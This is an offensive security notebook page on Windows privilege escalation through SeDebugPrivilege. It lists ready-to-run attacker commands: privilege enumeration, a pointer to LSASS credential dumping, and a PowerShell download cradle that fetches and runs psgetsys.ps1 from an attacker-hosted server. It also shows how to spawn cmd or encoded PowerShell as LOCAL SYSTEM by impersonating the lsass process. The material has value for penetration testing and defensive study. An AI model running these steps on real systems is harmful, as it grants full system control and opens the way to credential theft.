SEDEBUGPRIVILEGE

PRIMARY CATEGORY → WINDOWS PRIVESC

Enumeration

whoami /priv

LSASS Dump

If we compromise a domain or local user account which has the seDebugPrivilege enabled, we may be able to generate a memory dump of certain protected and sensitive processes such as LSASS

See LSASS Memory Dump

RCE as LOCAL SYSTEM

PSGetSystem

PSGetSystem

Setup

From the Attacker ⚔️

curl --silent --location --request GET "https://github.com/decoder-it/psgetsystem/raw/refs/heads/master/psgetsys.ps1" --remote-name

python3 -m http.server 80

From the Target 🎯

IEX (New-Object Net.WebClient).downloadString('http://<ATTACKER>/psgetsys.ps1')

Process PID as Local System

Once we have imported the powershell functionality into our current session, we have to locate a system process running as LOCAL SYSTEM

A non-privileged system account usually does not have enough privileges to list the owner of each existing process

However, there are several know processes in a Windows system that are known to always run as Local System, such the LSASS process

Therefore, we can list the details of one of them to obtain its PID

( Get-Process | ? { $_.ProcessName -eq '<PROCESS_NAME>' } ).Id

e.g.

( Get-Process | ? { $_.ProcessName -eq 'lsass' } ).Id

Command Execution

With the required PID, we can run the command below to spawn a new child process of the latter, which will be executed as LOCAL SYSTEM

Remember that seDebugPrivilege allows an arbitrary process, such as cmd.exe, to debug any non-protected process, being able to read and write to the memory space of the latter

And that’s actually what we are doing here

ImpersonateFromParentPid -ppid <PARENT_PID> -command "<COMMAND>" -cmdargs "<COMMAND_ARGS>"

e.g.

ImpersonateFromParentPid -ppid <PARENT_PID> -command "C:\Windows\System32\cmd.exe" -cmdargs "/c powershell.exe -EncodedCommand <BASE64_STRING>"

Examples

- POV

References

Decoder: Getting System

💥Cyb3rBook

Explorer